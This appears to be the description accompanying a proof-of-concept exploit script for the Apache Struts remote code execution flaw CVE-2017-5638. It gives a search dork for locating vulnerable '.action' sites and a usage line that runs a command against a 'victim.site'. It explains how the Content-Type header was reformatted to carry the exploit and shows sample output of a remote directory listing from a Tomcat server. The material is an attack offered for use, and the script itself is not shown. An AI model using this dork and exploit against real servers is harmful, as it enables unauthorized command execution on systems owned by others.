Example PoC Code for CVE-2017-5638 | Apache Struts Exploit | DORK: ext:action
USAGE: python struts.py https://victim.site dir
The initial Python Script that was Posted didn't correctly format the Content-Type Header. I recoded the Content Type Header to properly format Content-Type:%20{Exploit}. I also added a logging and Requests, then dumped the Object Properties to stdout.
SAMPLE OUTPUT
Check for CVE-2017-5638 by XSS.Cx
Volume in drive D has no label. Volume Serial Number is 2A7B-A245 Directory of d:\Program Files\Apache Software Foundation\Tomcat 9.0